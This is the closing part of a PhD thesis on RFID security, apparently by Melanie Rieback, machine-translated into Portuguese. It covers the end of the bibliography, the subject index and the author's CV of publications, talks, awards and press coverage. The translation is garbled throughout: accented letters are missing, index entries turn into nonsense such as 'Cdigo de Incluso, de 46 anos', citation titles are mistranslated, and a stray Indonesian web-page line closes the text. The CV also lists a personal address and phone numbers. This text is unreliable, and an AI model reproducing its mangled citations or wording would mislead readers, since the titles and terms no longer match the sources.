Melody Vargas. 2002 pesquisa de segurana no varejo mostra EUA varejos perder $ 31 billeo ao roubo. Em About.com, 2002. http://retailindustry.about.com/od/statistics_loss_ prevention/l/aa021126a.htm. [165] John Viega e Gary McGraw. Construo de Software Secure: Como Evitar Segurana Problemas o caminho certo. Addison-Wesley Professional, 2001. [166] Nicholas Weaver, Vern Paxson, Stuart Staniford, e Robert Cunningham. Um imposto de taxonomia de worms de computador. Em Primeiro Workshop sobre cdigos maliciosos Rpida (WORM), 2003. [167] Stephen Weis. Segurana e privacidade em dispositivos de identificao de rdio-freqncia. Master tese, Massachusetts Institute of Technology (MIT), Massachusetts, EUA, maio 2003. [168] Stephen Weis. Paralelos de segurana entre pessoas e dispositivos generalizada. Em InterSeminrio nacional sobre Pervasive Computing e Segurana Comunicao - PerSec 2005, pginas 105-109, Ilha de Kauai, HI, EUA, maro de 2005. IEEE, IEEE Computer Society Press. [169] Stephen Weis, Sanjay Sarma, Ronald Rivest, Daniel e Engels. Segurana e aspectos de privacidade de baixo custo de sistemas de identificao de rdio freqncia. Em Segurana em Pervasive Computing, o volume de 2802 Notas de Aulas em Cincia da Computao, pginas 201-212, 2004. [170] Mark Weiser. O computador para o sculo XXI. Scientific American, pginas 94-100, 1991. [171] Harald Welte. LibMRTD. 2006. http://openmrtd.org/projects/libmrtd/index.html. [172] Harald Welte. LibRFID. 2006. http://openmrtd.org/projects/librfid/. [173] Harald Welte e Milosch Meriac. RFID Sniffer. 2006. http://www.openpcd.org/ rfiddump.0.html.

BIBLIOGRAPHY

145

[174] Harald Welte, Milosch Meriac, e Brita Meriac. OpenPICC. http://www.openpcd. org/openpicc.0.html. [175] Harald Welte, Milosch Meriac, e Brita Meriac. OpenPCD. 2006. http://www. openpcd.org /. [176] Jonathan Westhues. Qualquer coisa para-proxmarkii, Dezembro 2005. http://cq.cx/proxmarkii.pl. [177] Jonathan Westhues. ProxMark 3. 2007. http://cq.cx/proxmark3.pl. [178] Jonathan Westhues. Verichip Cloner. 2007. http://cq.cx/verichip.pl. [179] Johannes Wolkerstorfer. elptica curva de criptografia adequado para prender RFID tags? Apostila da Oficina ECRYPT em RFID e Crypto Leve, julho 2005. [180] Kirk Wong, Patrick Hui, e Allan Chan. Criptografia e autenticao em Tags RFID passivo para produtos de vesturio. Computadores na Indstria, Maio de 2006. [181] Adam Young e Moti Yung. Cryptovirology extorso baseada em ameaas segurana e contramedidas. Em Proc. IEEE Symposium on Security and Privacy, pgina 129, Washington, DC, EUA, 1996. [182] Ernst & Young. Varejistas perdem bilhes anualmente ao encolhimento de estoque. http: / / Retailindustry.about.com/cs/lp_retailstore/a/bl_ey051303.htm. [183] Tom Zeller. Mercado negro de dados de cartes de crdito roubados prospera na internet. Em New York Times. http://www.nytimes.com/2005/06/21/technology/21data.html?ei =
5088 & en = c06809aa240685f8 & ex = 1277006400 & adxnnl = 1 & parceiro = & emc = rssnyt rss & pagewanted = all & adxnnlx = 1162917731-sbNrtWOThtPy3rRh + yHnAQ.

EuNDEX
controle de acesso, 21 tags ativos, 19 rastreamento de animais, 21 Pagamento automtico, 19 back-end de arquitetura, 19 backdoors, 48 Verificao de limites, 60 Buffer overflows, 47 desafio-resposta, 32 clonagem, 31 Cdigo de Incluso, de 46 anos constelaes, 30 cartes de crdito, 19 Criptografia, 33 David Beckham, 29 Denial of Service, 31 passaportes digitais, 21 Etiquetas EAS, 19 Electronic Article Surveillance, 19 Electronic Product Cdigo Net (EPC) trabalho, 19 EZ-Pass, 19 Gaiola de Faraday, 31, 34 Harry Stockman, 18 Etiquetas HF, 19 Atacantes de alto oramento, 26 Amigo ou inimigo de identificao, 18 Roubo de identidade, 28 ntrons, 52 Johns Hopkins University, 29 Legislao, 35 Tag LF, 19 Low-Budget atacantes, 26 middleware, arquitetura 44, 50 multiquine, 53 Perto Field Communications, 19 Atacantes no tradicionais, 26 Etiquetas passivas, 19 Cargas, 48 Produtos farmacuticos, 22 controle de acesso fsico, 34 roubo fsico, 29 vrus polimrficos, 53 Pseudnimos, 34 gerador de nmeros pseudo-aleatrios, 34 bilhetes de transporte pblico, 19

Quines, 52 Radar, 18 Radio Frequency Identification, 8, 17 Dispositivos de repetio de 31 de varejo, 22 RFID Crimeware, 25 RFID Exploits, 42 RFID honeypots, 61 RFID indstria, 22 RFID malware, 41

EuNDEX

147

RFID phishing, 61 Tags RFID, 18 RFID vrus, 50 RFID Vrus, 43 RFID wardriving, 61 RFID worm, 49 RFID Worms, 43 RSA Security, 29

saneantes dados de entrada, 60 programao segura, 61 Auto-referencial comandos, 51 semi-ativa tags, 19 Server-Side Includes, 54 transporte de contineres, 22 bugs de software, 41 spoofing, 31 SQL Injection, 45 cadeia de fornecimento, 19

Desativao temporria, 33 TI-DST, 29 Etiquetas UHF, 19 Departamento de Defesa dos EUA, 19 vandalismo, 27 Verichip, 22 Wal-Mart, 19 armazm de automao, 50

EuNDEX

149

Melanie Rose Rieback


Vrije Universiteit Departamento de Cincia da Computao De Boelelaan 1081a 1081 HV, Amsterdam, Holanda +31 (20) 5987874
melanie@cs.vu.nl http://www.few.vu.nl/ ~ melanie /

Laan van Kronenburg 301 1183 AS, Amstelveen Holanda +31 (6) 17815146

Lnguas Educao

Ingls (lngua materna), holandeses (fluente). Vrije Universiteit, Amsterdam, Holanda. Ph.D. em Cincia da Computao (Computer Systems grupo) Ttulo da tese: Segurana e privacidade de Identificao por Rdio Frequncia. Tese Orientador: Prof Andrew S. Tanenbaum Universidade Tcnica de Delft, Delft, The Netherlands.2001-2003 M.Sc. em Cincia da Computao. Projeto de tese: Meta-Mecanismo de Correlao alerta. Projeto envolveu projetar e implementar um sistema especialista para gerenciar e correlacionar Deteco de alertas de intruso. Universidade de Miami, Coral Gables, Florida.1996-2000 B.Sc. em Biologia / Cincias da Computao (menores de Qumica e Matemtica). Cum Laude. Honors programa geral. Provost e rolo Presidente de Honra. Projeto de pesquisa independente: Projeto envolveu o uso de programao linear para resolver otimizao de o em problemas de modelagem molecular. 2003-2008

Trabalho experincia

Vrije Universiteit, Amsterdam(Novembro de 2007 - Presente) Professor Assistente de Cincia da Computao (Sistemas de Computao). Responsvel pela investigao, ensino, conceder escrito, orientam os alunos, alguns trabalhos administrativos. MIT Center for Genome Research / Whitehead Institute (Junho de 2000 - Julho de 2001) Projeto Genoma Humano. Desenvolvimento de software e soluo de problemas de alto rendimento seqenciamento genmico "pipeline". Muito usado Perl, Oracle (PL / SQL), e UNIX shell proprogramao. Compugen.(Junho de 1999-setembro 1999) Projetada (e implementada em C) um algoritmo para levar dois "contigs" da informao gentica (MRNA DNA), como entrada, e encontrar todos os diffrncias entre eles. Isso foi no fim para traar as origens do contigs modificado em cima de novas verses do banco de dados, e avaliar mudanas no algoritmo da Assemblia. Escreveu tambm uma ferramenta de anlise estatstica em que acompanha Perl. Siemens Networks Telecom(Junho de 1998 -. Agosto 1998) VB e Access desenvolvimento de banco de dados, testes de sistema de redes IP, Java desenvolvimento de Sistema de ferramentas de engenharia. Siemens Networks Telecom(Junho de 1997 -. Agosto 1997) VC + + anlise de mercado de programao, desenvolvimento de pginas Web e Internet Sunrise Symphonic Pops Orchestra(Maro de 1995 -. Nov 1997) Participaram todos os ensaios e apresentaes. Realizada Cimarosa Concerto para Obo e Cordas com a orquestra em 17 de maro de 1996.

Especial Prmios e Honras

Prmios e Reconhecimentos recentes Keynote Speaker: Conferncia sobre RFID Security 2007 IEEE PerCom 2006: Best Paper Award de Alto Impacto USENIX Lisa 2006: Prmio de Melhor Artigo Holanda Science Foundation (NWO) I / O Prize 2006 Finalista holands Internet Society (ISOC) Award 2006 (Categoria: Segurana e Privacidade) VU Media Award 2006: categoria "Rising Star" (Mediakomeet) Prmios e Reconhecimentos mais velhos Barry M. Goldwater vencedor bolsa em Matemtica, Cincia e Engenharia 1999 Universidade de Miami: Joseph G. Hirschberg Fsica Prize 1997 Universidade de Miami: Henry King Stanford bolsa vencedor 1996 Siemens Stromberg-Carlson A.P.E. bolsa vencedor 1996 AP Scholar com Distino 1996

Arbitrados Publicaes

M.R. Rieback. "Segurana e privacidade de Radio Frequency Identification", Ph.D. Dissertaeso, setembro 2008. A. Mitrokotsa, M. R. Rieback, A.S. Tanenbaum "Classificao de RFID Attacks" Intl 2. Workshop sobre Tecnologia RFID (IWRT'08), Barcelona, Espanha, junho de 2008. M.R. Rieback, S. Keijser, R.F.H. Hofman, G.N. Gaydadjiev, B. Crispo, A.S. Tanenbaum. "Toolkit para uma Indstria de Segurana RFID". (Em submisso). M.R. Rieback, B. Crispo, A.S. Tanenbaum. "Crimeware RFID." Crimeware. Editores: Zulfikar Ramzan, Markus Jakobssen, Addison-Wesley, 2007. M.R. Rieback, G.N. Gaydadjiev, B. Crispo, R.F.H. Hofman, A.S. Tanenbaum. "A Plataforma para RFID Segurana e Administrao de Privacidade. "Instalao USENIX / SAGE 20 Large Sistema de Administrao Conference (LISA 2006), Washington DC, dezembro de 2006. O melhor Prmio de papel. M.R. Rieback, Patrick N. D. Simpson, B. Crispo, A.S. Tanenbaum. "Malware RFID: Design Princpios e exemplos "Pervasive e Computao Mvel (PMC) Journal, vol. 2 (4): 405 426, Elsevier, 2006. M.R. Rieback, B. Crispo, A.S. Tanenbaum. "Malware RFID: Verdade vs Mito". IEEE Security and Privacy, vol. 4 (4) :70-72, de 2006. M.R. Rieback, B. Crispo, A.S. Tanenbaum, "Proteo da Privacidade na Era da RFID" (Poster). 5 USENIX / NLnet Administrao de Sistemas e Engenharia de Redes Confereferncia (SANE 2006), Delft, Holanda, maio, 2006. M.R. Rieback, B. Crispo, A.S. Tanenbaum. "Is Your Cat Infected com um vrus de computador?" Proc. 4 IEEE Intl. Conf. em Pervasive Computing and Communications. (IEEE PerCom 2006), Pisa, Itlia, maro de 2006. Best Paper Award. M.R. Rieback, B. Crispo, A.S. Tanenbaum. "A Evoluo de RFID Segurana." IEEE Pervasive Computing, vol. 5 (1) :62-69, de 2006. M.R. Rieback, B. Crispo, A.S. Tanenbaum. "RFID Guardian: A Mobile Battery-Powered Dispositivo para RFID Gesto de Privacidade. "Proc. Conferncia Australasian 10 de Informao Segurana e privacidade. (ACISP 2005), Brisbane, Austrlia, Julho de 2005. M.R. Rieback, B. Crispo, A.S. Tanenbaum. "Legislao Unindo com RFID privacidade Melhorar Technologies. "Proc. 3 Conferncia sobre Segurana e Proteco de Dados. (SPI 2005), Brno, Repblica Checa, maio de 2005.

M.R. Rieback, B. Crispo, A.S. Tanenbaum. "Keep on Blockin 'no Mundo Livre: Personal Controle de acesso para Etiquetas RFID de baixo custo. "Proc. 13 Cambridge Workshop Internacional Protocolos de Segurana, abril de 2005. O Internacional Human Genome Sequencing Consortium *. "Seqenciamento inicial e analYsis do genoma humano ". Nature 409:860-921 2001. * = Veja a lista completo do autor, sob Whitehead Institute, MIT Center for Genome Research: http://www.nature.com/nature/journal/v409/n6822/extref/409860aa.doc Selecionado Convidado Negociaes "RFID: Aplicaes, segurana, privacidade e ", Ecltica Tecnologia Carnaval, Amsterdam, June 2008. "Honeypots em um mundo com etiquetas RFID ", Conferncia TERENA Networking, Bruges, Belgium, maio de 2008. "O OV Chipkaart eo Guardio RFID ", Modern Talking: RFID Workshop, Linz, ustria, abril de 2008. "RFID Questes de segurana e RFID Guardian ", a Daimler Security Conference, Stuttgart, Alemanha, Abril de 2008. "O Futuro da RFID Segurana ", no painel: 'RFID Segurana e Privacidade: investigao a longo prazo ou Curto prazo Tinkering? "Primeiro, a ACM Conferncia sobre segurana sem fio (WiSec), Alexandria, VA, abril de 2008. "A Plataforma unificada para RFID Segurana / Privacidade ", RFID Segurana Workshop: Da Teoria Para praticar, Lorentz Center, Leiden, Holanda, maro de 2008. "Kwetsbaarheden rond de RFID en OV Chipkaart "," Mesa Redonda ISACA, Breukelen, Pases terras, maro de 2008. "RFID Segurana "," RFID: Onbegrensde Kansen en Bedreigingen, Kivi-NIRIA, Den Haag, Holanda, fevereiro de 2008. ''Tools para uma indstria de segurana RFID ", RFID Workshop de Segurana: Da Teoria Prtica, Baltimore, MD, janeiro de 2008. ''Tools para uma indstria de segurana RFID ", DeepSec, Viena, ustria, Novembro de 2007. ''A Plataforma unificada para RFID Segurana / Privacidade ", Simpsio GovCERT, Noordwijk, Pases terras, outubro de 2007. ''Presente e Futuras direes na RFID Segurana ", Recordando RFID, Amsterdam, Pases terras, outubro de 2007. ''Inventing da Indstria de Segurana RFID ", Conferncia sobre RFID Segurana, Mlaga, Espanha, julho 2007. Abertura Keynote. ''De Vrus para Firewalls: RFID da segurana / privacidade em bibliotecas ", American Library AssoConferncia associao (ALA) Anual, Washington DC, junho de 2007. ''O Arte de RFID Explorao ", 19 Conferncia Anual FIRST, Sevilha, Espanha, junho 2007. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", O'Reilly Emerging Tecnologia Conference, San Diego, CA, maro de 2007. ''RFID: Aplicaes, Ameaas e Contramedidas ", segundo informao MIS Anual SecuCpula rana, Londres, Inglaterra, Maro de 2007. ''RFID Malware Demystified ", IT-Defesa, Leipzig, Alemanha, fevereiro de 2007. ''O Arte de RFID Explorao ", Infosecurity Italia, Milo, Itlia, fevereiro de 2007. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", Polytechnic Universidade de Milo, Milan, Itlia, fevereiro de 2007.

''A Toolkit hacker para RFID Emulao e Jamming ", Chaos Communication Congress, Berlim, Alemanha, dezembro de 2006. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", CSAIL, Massachussetts Institute of Technology, Boston, Massachusetts, em dezembro de 2006. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", Universidade de Massachusetts, em Amherst, Amherst, Massachusetts, em dezembro de 2006. ''O Arte de RFID Explorao ", Tokyo International Security Conference, Tokyo, Japo, Novembro de 2006. ''RFID: A promessa e os perigos ", Mediamatic Institute, Amsterdam, novembro, 2006. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", Universidade de Califrnia em Berkeley, Califrnia, October, 2006. ''RFID Malware Demystified ", Opus Segurana, San Francisco, Califrnia, October, 2006. ''De Felinos de Firewalls: Reflexes sobre RFID Segurana / Privacidade ", Pases Baixos Cincia Foundao (NWO), Computador de Eventos Plataforma Cincia Anual (SIREN), Utrecht, Holanda, Outubro de 2006. ''RFID Guardian: Uma Plataforma de Pessoal para RFID Privacy Management ", CAIDA / San Diego Supercomputer Center (UCSD), San Diego, Califrnia, agosto de 2006. ''A Toolkit hacker para RFID Emulao e Jamming ". DefCon 14, Las Vegas, Nevada, Agosto de 2006. ''RFID Malware Demystified ". Preto Hat Briefings, Las Vegas, Nevada, agosto de 2006. ''RFID Segurana e privacidade ". Dorkbot, Gent, Blgica, Junho de 2006. Introduo'' Malware para RFID, Informao "Sistemas de Segurana reunio da Associao, Delft, Holanda, junho de 2006. ''Tag-Borne Ataques contra Middleware RFID ", Workshop sobre Segurana em RFID e ConCartes sem tato, SAFE-NL, Delft, Holanda, junho de 2006 Introduo'' Malware para RFID ". Accenture srie apresentao SCCoP. Maio de 2006. ''RFID De segurana para administradores de sistema ". 5 USENIX / NLnet Administrao de Sistemas e Redes Engenharia (SANE 2006), Delft, Holanda, maio, 2006. ''De Ciberespao para sua cozinha: New Directions in vrus de computador ", 1 Workshop sobre a Teoria do vrus de computador, LORIA, Nancy, Frana, Maio de 2006 ''RFID Malware: Como Infect a Internet das Coisas ", srie de seminrios DIT, da Universidade de Trento, Trento, Itlia, maro 2006 ''RFID Malware: Como Infect a Internet das Coisas ", ICS Srie de Seminrios da Universidade de Roma "La Sapienza", Roma, Itlia, maro 2006 ''RFID: Aplicaes, Ameaas e Contramedidas ", CS Colquio Series, Universidade de Miami, Coral Gables, FL, fevereiro 2006 ''RFID Guardian: Uma Plataforma de Pessoal para RFID Segurana / Privacidade ", Raboud University, Nijmegen, fevereiro 2006 ''RFID Quer ser livre! ", Software Freedom Day, FSF, Tilburg, setembro 2005 Fun'' Mayhem e com RFID ", que hack A, USENIX/2600, Liempde, julho 2005 ''O Futuro da RFID Segurana ", Philips Research, Eindhoven, maro 2005 ''Segurana Desafios em Computao Ubqua ", Gnarp Workshop, Renesse, maro 2004 Selecionado Mdia Cobertura ''RFID Tudo etiquetas de rastreamento (inclusive voc) ", Patrick Kiger, Discovery Channel Blog, Abril 2008. Rdio Entrevista: BNR Nieuwsradio, 2 de abril de 2008.

''Poederchips je em haar ", Ferry Piekart, Algemene Dagblad, abril 2008. Raa'' tegen klok voor ov-chip ", Vincent Dekker, Trouw, Mar 2008. OV Chipkaart cobertura da imprensa. 20 artigos janeiro 2008, incluindo: "Geachte Kamerleden, zo Kraak je dus de ov-kaart", de Volkskrant, Jan 2008. "Kamer em actie: valt chipkaart nog redden te?", Paul Vereijken e Jeroen Wester, NRC Handelsblad, Jan 2008. "Geheime software nekte ov-chip", Michiel van Nieuwstadt, NRC Handelsblad, Jan 2008. TV Entrevista: NOS Journaal, Jan 2008. Rdio Entrevista: Radio 1, janeiro 2008. Jam'' Sesso: Um projeto para o Bloco Etiquetas RFID ", Wendy M. Grossman, Scientific American, Julho de 2007. Rdio'' Chips e Ferramentas Hacker ", Jan Rahm, Linux Magazine, abril de 2007. ''RFID Britches: risco de segurana ", Dennis O'Reilly, PC World, 01 de abril de 2007?. ''Manter Tags RFID de olhares indiscretos ", RFID Journal, Maro / Abril de 2007. ''RFID Estratgia - RFID privacidade e segurana ", Paul Faber, IndustryWeek, janeiro 9, de 2007. ''Seu Prprio Firewall RFID Pessoal ", Annalee Newitz, Popular Science, 28 de dezembro de 2006. ''RFID Firewall pessoal ", Bruce Schneier, Crypto-Gram, 15 de dezembro de 2006. '' RFID Automatizando Crime? ", M. Sparkes, Computing & Control Engineering Journal, Agosto-Setembro de 2006. Rdio Entrevista: BNR Nieuwsradio, 31 de agosto de 2006. ''RFID: De fato prontamente Fooled ", Richard Martin, Unstrung, 30 de agosto de 2006. Computador'' hackers comear lio sobre a clonagem de passaporte, etiquetas de carto de cash ", Glenn Chapman, AFP, 06 agosto de 2006. ''Como Seguro RFID? ", Sixto Ortiz, IEEE Computer, julho de 2006. ''RFID - Outra tecnologia, outra confuso de segurana ", William Knight, Maga-Infosecurity? zine, Maio / Junho de 2006. ''Incorporado Riscos ", Peter Neumann, Communications of the ACM, maio de 2006 ''Antwoorden op het kamervragen sobre RFID vrus "(Respondendo a perguntas do Parlamento sobre o Virus RFID), Transcrio de discusso, Ministrio Holands da Administrao Interna Affares, 9 Maio de 2006. Rdio Entrevista: Ao em Ao, 15 de abril de 2006. Rdio Entrevista: Holanda Radio 1, 4 de abril de 2006. ''Novo Mostra de pesquisa Necessidade de segurana aprimorada Aplicao RFID ", Gartner Notcias AnalYsis, 22 de maro de 2006. Estudo'' Diz Chips in ID Tags so vulnerveis ao vrus ", John Markoff, New York Times, Pgina C3, 15 mar 2006. ''Vervanger streepjescode vatbaar voor virussen ", Michael Persson, De Volkskrant, Pgina 1, 15 de marco de 2006 Cientistas'': Chips RFID pode carregar um vrus "(15 de maro de 2006) A histria foi pego por mais de 200 meios de comunicao, incluindo: CNN News, BBC News, Fox News, MSNBC News Reuters, UPI, Washington Post, International Herald Tribune, Sydney Morning Herald

Computerworld, PC World, New Scientist, Business Week, Red Herring Slashdot, RFID Journal, Securityfocus, The Register Profissional Servio de acadmicos Servio 2008 - Programa de Co-Presidente: RFID Segurana Workshop: Da Teoria Prtica - Membro PC: 22 USENIX Administrao do Sistema Large Installation - Membro PC: 2 Intl. Workshop sobre Tecnologia RFID - Membro PC: Conferncia da Primavera NLUUG - Revisor: Elsevier Pervasive Computing & Mobile

2007 Membro PC: 21 USENIX Administrao do Sistema Large Installation PC membro: 1 Intl. Workshop sobre Tecnologia RFID Membro PC: NLUUG Conferncia da Primavera de 2007, a Conferncia do 25 aniversrio Revisor: Elsevier Computadores e Engenharia Electrotcnica Revisor: Elsevier Pervasive Computing & Mobile Revisor: IEEE Computer Revisor: IEEE Communications Letters Revisor: IEEE Transactions on Dependable and Secure Computing Comit do Prmio: Prmio de Tecnologia de Privacidade Melhorar

2006 Membro PC: Conferncia Queda NLUUG Revisor: IEEE Transactions on Sistemas Paralelos e Distribudos Revisor: IEEE Transactions on Software Engineering Revisor: IEEE Pervasive Computing

Servio governo Led discusso de Privacidade TIC em holands Ministrio da Justia e Negcios Interiores Affares 'Comreunio missie Veiligheid en persoonlijke Levenssfeer 'subcomisso, junho de 2008. Testemunho especialista: audio parlamentar holands 'Tweede Kamer (OV Chipkaart Serana), Jan 2008. Advisory Group (RFID Security): Ministrio holands dos Transportes e Obras Pblicas (Verkeer en Waterstaat) - Jan / fev 2008 Led RFID discusso segurana / privacidade mesa redonda no NIST, dezembro de 2006. Apresentou uma avaliao de segurana / privacidade sem contato do NIST 800-96 projecto de norma, a convite do Departamento de Comrcio dos EUA, junho de 2006. Participante convidado para RFID segurana / privacidade debate, "RFID: van Kansen en Risico de nieuwe technologierevolutie ', no holands "Tweede Kamer der Staten-Generaal" (Casa de Representantes dos Estados) Tecnologia Geral reunio do Comit, abril de 2006 Outros Servio Membro do conselho: Holanda Unix User Group Co-fundador: Amsterdam Garota Geek Dinner

Ensino Experincia

Ensino Pervasive Computing Sistemas Operacionais Assistente de Ensino Redes de Computadores Linguagens de Programao (Outubro 2003 - junho de 2006) (Abril 2004 - setembro 2005) (Designing Novo Curso) (Fevereiro 2008 - Presente)

Anda mungkin juga menyukai